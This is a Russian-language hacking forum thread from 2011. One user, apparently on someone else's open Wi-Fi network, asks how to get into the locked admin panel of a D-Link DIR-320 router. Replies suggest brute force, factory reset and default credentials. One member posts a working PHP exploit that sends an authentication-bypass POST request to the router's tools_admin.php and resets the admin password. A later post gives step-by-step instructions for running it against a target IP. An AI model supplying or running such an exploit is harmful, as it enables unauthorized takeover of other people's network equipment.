обход логина и пасса на wi-fi

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by MAQUEEN, 21 Jun 2011.

  1. MAQUEEN

    MAQUEEN RadioActivity

    Joined:
    27 Sep 2008
    Messages:
    422
    Likes Received:
    126
    Reputations:
    32
    Обход авторизации на админку wi-fi

    Каряво назвал тему, знаю. :rolleyes:

    Вообщем, есть сеть, пасса на подключение к сети не стоит. А вот вход на роутер залочен. Можно ли обойтись без брута пароля ?

    роутер - D-LiNK DIR-320

     
    #1 MAQUEEN, 21 Jun 2011
    Last edited: 22 Jun 2011
  2. altblitz

    altblitz Elder - Старейшина

    Joined:
    5 Jun 2009
    Messages:
    3,694
    Likes Received:
    3,149
    Reputations:
    236
    Есть такие точки, подключение возможно без пасса.
    Но даже ping виснет.
     
  3. MAQUEEN

    MAQUEEN RadioActivity

    Joined:
    27 Sep 2008
    Messages:
    422
    Likes Received:
    126
    Reputations:
    32
    в смысле ?

    я подключаюсь через эту точку, и свободно лажу по сети. а вот на нее (админка) зайти не могу, так как нужен пасс.
     
    1 person likes this.
  4. Machine

    Machine Elder - Старейшина

    Joined:
    23 Jun 2008
    Messages:
    403
    Likes Received:
    116
    Reputations:
    117
    1. Брут
    2. Хард резет роутера.
     
  5. KUKLOVOD2

    KUKLOVOD2 Banned

    Joined:
    12 May 2011
    Messages:
    88
    Likes Received:
    7
    Reputations:
    1
    Если на Dir-300 стоит старая прошивка, то его можно ломануть сплоитом.
    Code:
    <?php  if(sizeof($argv)!=4) {     echo "Usage: php5 $argv[0] <router ip addres> <port>     <admin password>\n";     exit;  }  $ch=curl_init();  curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php");  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  curl_setopt($ch, CURLOPT_PORT, $argv[2]);  curl_setopt($ch, CURLOPT_POST, 1);  curl_setopt($ch,  CURLOPT_POSTFIELDS,"ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=Admin&admin_password1=".urlencode($argv[3]));  echo "+ starting request\n";  $out = curl_exec($ch);  if($out===false) {     echo "- Error: could not connect (     http://$argv[1]:$argv[2]/tools_admin.php).\n";     exit;  } else  echo "+ request sended\n";  curl_close($ch);  if(stripos($out,"login.php")===true) {     echo "- something goes wrong (check answer - answer.html) !\n";     $f=fopen("answer.html","w"); fwrite($f,$out); fclose($f);     exit;  }  else     echo "+ ok, now you can login using l: admin p:$argv[3]\n";  ?>
    Как запускать эксплоиты это уже в другой теме)Благодаря этой уязвимости можно послать пост запрос и сменить пароль на свой.
     
  6. MAQUEEN

    MAQUEEN RadioActivity

    Joined:
    27 Sep 2008
    Messages:
    422
    Likes Received:
    126
    Reputations:
    32
    оо) вот это уже что-то. спасибо.

     
  7. Machine

    Machine Elder - Старейшина

    Joined:
    23 Jun 2008
    Messages:
    403
    Likes Received:
    116
    Reputations:
    117
    ну если начинается с <?php, как ты думаешь?
     
  8. теща

    теща Экстрасенс

    Joined:
    14 Sep 2005
    Messages:
    2,027
    Likes Received:
    526
    Reputations:
    285
    дефолты пробей если паса нету я думаю там админ 100пудов ))
     
  9. KUKLOVOD2

    KUKLOVOD2 Banned

    Joined:
    12 May 2011
    Messages:
    88
    Likes Received:
    7
    Reputations:
    1
    качай какую-нибудь сборку с php (xampp, denver, appserv).Если xampp, при установке оставляешь галочку ток на php.сплоит этот сохраняешь на диске C например как sploit.php.Потом прописываешь в консоли cmd: C:/xampp/php/php.exe C:/sploit.php 192.168.0.1 80 123321
    где C:/xampp/php/php.exe - путь до компилятора пхп
    C:/sploit.php путь до сплоита
    192.168.0.1 - ип рутера
    80 - порт рутера
    123321 пароль который ты хочешь поставить.
     
  10. MAQUEEN

    MAQUEEN RadioActivity

    Joined:
    27 Sep 2008
    Messages:
    422
    Likes Received:
    126
    Reputations:
    32
    спасибо тебе большое, за то что не поленился расписать ) попробую) :)
     
    1 person likes this.